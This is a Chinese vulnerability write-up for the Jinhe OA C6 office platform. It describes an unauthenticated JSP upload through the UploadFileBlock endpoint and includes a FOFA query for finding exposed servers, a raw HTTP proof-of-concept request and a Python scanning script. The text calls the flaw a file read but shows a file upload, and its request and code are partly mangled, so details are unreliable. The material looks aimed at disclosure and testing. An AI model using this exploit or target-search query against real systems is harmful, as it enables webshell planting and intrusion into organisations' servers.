声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任

1. 产品简介

金和数字化智能办公平台（简称JC6）是一款结合了人工智能技术的数字化办公平台，为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准，支持组织数字化转型，实现业务流程的数字化、智能化和协同化，提高企业竞争力。

2.漏洞描述

金和OA协同办公管理系统C6软件（简称金和OA），该系统UploadFileBlock接口存在任意文件读漏洞。

http://xxxxxxxxxx/jc6/JHSoft.WCF/Attachment/UploadFileBlock

3.fofa查询语句

app="金和网络-金和OA"||body="/jc6/platform/sys/login"

4. 漏洞复现

默认页面如图

POC

POST /jc6/JHSoft.WCF/Attachment/UploadFileBlock HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 184
Content-Type: multipart/form-data; boundary=bbcea0206207b8222ea7bdee4e0f92fa--bbcea0206207b8222ea7bdee4e0f92fa
Content-Disposition: form-data; name="filename"; filename="tteesstt.jsp"<% out.println("tteesstt"); %>
--bbcea0206207b8222ea7bdee4e0f92fa--

上传的文件路径：http://xxxxxxxx/jc6/upload/tteesstt.jsp 

5.python检测脚本

import requestsdef verify(ip):url = f'{ip}/jc6/JHSoft.WCF/Attachment/UploadFileBlock'headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0','Accept-Encoding': 'gzip, deflate','Accept':' */*','Connection': 'close','Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3','Accept-Language': 'zh-CN,zh;q=0.8','Content-Length': '184','Content-Type': 'multipart/form-data; boundary=bbcea0206207b8222ea7bdee4e0f92fa'}payload = '''--bbcea0206207b8222ea7bdee4e0f92faContent-Disposition: form-data; name="filename"; filename="tteesstt.jsp"<% out.println("tteesstt22"); %>--bbcea0206207b8222ea7bdee4e0f92fa--'''try:response = requests.post(url, headers=headers, data=payload,verify=False)# 验证成功输出相关信息if response.status_code == 200 :print(f"{ip}存在金和OA UploadFileBlock接口任意文件上传漏洞！！！")except Exception as e:passif __name__ == '__main__':self = input('请输入目标主机IP地址：')verify(self)